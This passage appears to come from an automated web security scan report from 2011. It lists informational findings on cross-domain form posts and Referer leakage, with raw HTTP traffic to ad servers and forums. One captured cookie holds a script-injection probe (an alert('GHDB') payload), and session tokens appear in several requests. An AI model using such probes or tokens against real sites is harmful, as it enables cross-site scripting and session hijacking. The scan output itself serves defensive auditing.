<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

17.8. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resourcenter.net
Path:   /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The page contains a form which POSTs data to the domain www.nanpa.org. The form contains the following fields:

Request

POST /Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html?Action=Find_Store_Items&Time=-1775958525&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s HTTP/1.1
Host: www.resourcenter.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html?Action=Store
Cookie: SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s; __utma=11887927.350769674.1305159223.1305159223.1305159223.1; __utmb=11887927.1.10.1305159223; __utmc=11887927; __utmz=11887927.1305159223.1.1.utmcsr=nanpa.org|utmccn=(referral)|utmcmd=referral|utmcct=/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

Template=NANPA+Gear&MarketName_W=&bFindInventory=Find+Item%28s%29&NumToShow=10

Response

HTTP/1.0 200 OK
Server: 4D_WebStar_D/2004
Date: Thu, 12 May 2011 00:14:02 GMT
Connection: close
Last-Modified: Thu, 12 May 2011 00:14:02 GMT
Content-Type: text/html;Charset=ISO-8859-1
Content-Length: 27135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...

18. Cross-domain Referer leakage  previous  next
There are 37 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


18.1. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=125x125;tile=2;pos=smsquare1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:08 GMT
Content-Length: 357

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/c;222977620;0-0;0;44107191;3-125/125;36626365/36644243/1;;~sscs=%3fhttp://connectedplanetonline.com/wireless-broadband/"><img src="http://s0.2mdn.net/viewad/2577238/CP_MotoWirelessCenter10_125.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.2. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=120x60;tile=5;pos=button1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:15 GMT
Content-Length: 334

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/t;221160671;0-0;0;44107191;6-120/60;35086960/35104790/1;;~sscs=%3fhttp://www.connectedplanetonline.com/whitepapers"><img src="http://s0.2mdn.net/viewad/2577238/CP_WPP120.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.3. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=336x280;tile=3;pos=boombox1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:11 GMT
Content-Length: 375

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/f;222973530;0-0;0;44107191;4252-336/280;37538309/37556187/1;;~sscs=%3fhttp://connectedplanetonline.com/progress-software/?cid=336"><img src="http://s0.2mdn.net/viewad/2577238/1-CP_ProgressSoftware_Micro_336ver3.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.4. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;dcopt=ist;sz=728x90;tile=1;pos=fullbanner1;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:48:04 GMT
Content-Length: 328

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/k;238282886;0-0;0;44107191;3454-728/90;41177685/41195472/1;;~sscs=%3fhttp://www.tmforum.org/mw2011cp"><img src="http://s0.2mdn.net/viewad/2577238/MWDublin728X90WEB.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.5. http://ad.doubleclick.net/adj/connectedplanet.iclick.com/adtarget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/connectedplanet.iclick.com/adtarget;abr=!webtv;page=purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=300x125;tile=4;pos=small3001;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:13 GMT
Content-Length: 334

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/q;221184486;1-0;0;44107191;367-300/125;35182385/35200203/1;;~sscs=%3fhttp://blog.connectedplanetonline.com/jolt/"><img src="http://s0.2mdn.net/viewad/2577238/CP_JOLT_300.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.6. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2333498;type=vonag670;cat=afill201;ord=8458235408179.462? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/lp/US/afflpdc/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Thu, 12 May 2011 00:50:40 GMT
Expires: Thu, 12 May 2011 00:50:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 682

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start Quantcast
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3eN-KnpwQqheA.gif?labels=_fp.event.AFFILIATE-RESIDENTIAL-DC" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

18.7. http://forum.link2voip.com/viewtopic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.link2voip.com
Path:   /viewtopic.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /viewtopic.php?f=19&t=185 HTTP/1.1
Host: forum.link2voip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:44:43 GMT
Set-Cookie: phpbb3_82ha5_u=1; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Set-Cookie: phpbb3_82ha5_k=; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Set-Cookie: phpbb3_82ha5_sid=30cf441e48c964d411cc69972e856ae1; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Content-type: text/html; charset=UTF-8
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 36649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<span class="copyright">phpBB skin developed by: <a href="http://www.phpbbhq.com/">phpBB Headquarters</a><br />Powered by <a href="http://www.phpbb.com/">phpBB</a>
...[SNIP]...

18.8. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=90&slotname=2160251714&w=728&lmt=1302640331&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156434&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739%2C6042837393&correlator=1305161156578&frm=0&adk=1126279905&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=3&dtd=269&xpc=T6jA0ZNAkz&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:45:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13874

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.dslreports.com/forum/r25728643-Nettalk-number-portability-%26hl%3Den%26client%3Dca-pub-5216754536572039%26adU%3DBestVoIP.Smart-VoIP.com%26adT%3DWhich%2BVoIP%2Bis%2Bthe%2BBest%253F%26adU%3DSmartAsk.com/CellPlanCompare%26adT%3DCell%2BPhone%2BPlans%26adU%3DTech-Support.JustAnswer.com%26adT%3DAsk%2BTech%2BSupport%2BNow%26gl%3DUS&amp;usg=AFQjCNFp5mjttW0Q6PhHxF-BTGCGfjd8Og" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.9. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:45:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10296

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.dslreports.com/forum/r25728643-Nettalk-number-portability-%26hl%3Den%26client%3Dca-pub-5216754536572039%26adU%3DVerizon.com/SmallBusiness%26adT%3DVerizon%2BOfficial%2BSite%26adU%3DComputer.JustAnswer.com%26adT%3DAsk%2BTech%2BSupport%2BNow%26adU%3Dwww.NokiaUSA.com/Astound%26adT%3DNokia%2BAstound%2Bon%2BT-Mobile%26adU%3DBlackBerry.com/Pearl%26adT%3DBlackBerry%25C2%25AE%2BPearl%25E2%2584%25A2%2B8220%26gl%3DUS&amp;usg=AFQjCNF-5XU8Fnbt_S9qbaSHOUxsm1BwVg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...

18.10. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=90&slotname=2685156739&w=728&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156423&bpp=3&shv=r20110427&jsv=r20110427&correlator=1305161156578&frm=0&adk=3420841610&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=1&dtd=265&xpc=HEBJlUc6zt&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:45:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3137

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
<NOSCRIPT><a href="http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.48992&rtbip=64.74.116.147&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKJIbMM3bHjpFaHR0cDovL3d3dy5kc2xyZXBvcnRzLmNvbS9mb3J1bS9yMjU3Mjg2NDMtTmV0dGFsay1udW1iZXItcG9ydGFiaWxpdHktQgcIoqkIEOYBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloG3WHXck_gAHDtoCeBJABx4UIoAEBqAH2igiwAQI&redirecturl2=http://ad.doubleclick.net/jump/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=48992?"><IMG SRC="http://ad.doubleclick.net/ad/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=48992?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement">
...[SNIP]...
